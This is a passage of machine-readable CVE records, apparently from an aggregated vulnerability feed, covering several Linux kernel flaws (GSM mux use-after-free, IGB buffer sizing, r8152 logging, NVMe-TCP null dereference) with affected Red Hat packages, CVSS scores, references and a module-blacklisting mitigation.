Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-3", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-27", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel8-operator", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.7.13-12", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-527", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-225", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.7::el8" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel8", "product": "RHOL-5.7-RHEL-8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-57", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:30:31.467Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0930", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0930" }, { "name": "RHSA-2024:0937", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0937" }, { "name": "RHSA-2024:1018", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1018" }, { "name": "RHSA-2024:1019", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1019" }, { "name": "RHSA-2024:1055", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1055" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1253", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1253" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1607", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1607" }, { "name": "RHSA-2024:1612", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1612" }, { "name": "RHSA-2024:1614", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1614" }, { "name": "RHSA-2024:2093", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2093" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2621", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2621" }, { "name": "RHSA-2024:2697", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2697" }, { "name": "RHSA-2024:4577", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4577" }, { "name": "RHSA-2024:4729", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4729" }, { "name": "RHSA-2024:4731", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4731" }, { "name": "RHSA-2024:4970", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4970" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6546" }, { "name": "RHBZ#2255498", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498" }, { "url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3" }, { "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527" } ], "timeline": [ { "lang": "en", "time": "2023-12-18T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-21T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: gsm multiplexing race condition leads to privilege escalation", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by preventing the affected `n_gsm` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-362-\u003eCWE-416: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) leads to Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6546", "datePublished": "2023-12-21T20:01:03.217Z", "dateReserved": "2023-12-06T07:11:48.937Z", "dateUpdated": "2024-09-13T23:30:31.467Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45871
Vulnerability from cvelistv5
Published
2023-10-15 00:00
Modified
2024-08-02 20:29
Severity ?
EPSS score ?
Summary
An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:29:32.566Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=bb5ed01cd2428cd25b1c88a3a9cba87055eb289f" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.5.3" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231110-0001/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:07:05.019133", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=bb5ed01cd2428cd25b1c88a3a9cba87055eb289f" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.5.3" }, { "url": "https://security.netapp.com/advisory/ntap-20231110-0001/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-45871", "datePublished": "2023-10-15T00:00:00", "dateReserved": "2023-10-15T00:00:00", "dateUpdated": "2024-08-02T20:29:32.566Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3594
Vulnerability from cvelistv5
Published
2022-10-18 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
Linux Kernel BPF r8152.c intr_callback logging of excessive data
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.039Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211363" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-404", "description": "CWE-404 Denial of Service -\u003e CWE-779 Logging of Excessive Data", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=93e2be344a7db169b7119de21ac1bf253b8c6907" }, { "url": "https://vuldb.com/?id.211363" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel BPF r8152.c intr_callback logging of excessive data", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3594", "datePublished": "2022-10-18T00:00:00", "dateReserved": "2022-10-18T00:00:00", "dateUpdated": "2024-08-03T01:14:02.039Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6536
Vulnerability from cvelistv5
Published
2024-02-07 21:05
Modified
2024-09-13 23:30
Severity ?
EPSS score ?
Summary
Kernel: null pointer dereference in __nvmet_req_complete
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0723 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0724 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0725 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0881 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0897 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1248 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2094 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3810 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6536 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2254052 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-6536", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-08T14:26:21.002030Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:22:45.294Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:13.955Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "name": "RHSA-2024:3810", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3810" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6536" }, { "name": "RHBZ#2254052", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254052" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240415-0001/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.rt7.320.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.58.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-22", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-11", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-407", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-479", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-247", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-5", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-227", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-470", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-14", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-2", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-24", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-10", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-525", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-224", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-56", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Alon Zahavi for reporting this issue." } ], "datePublic": "2023-12-11T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u0027s NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, 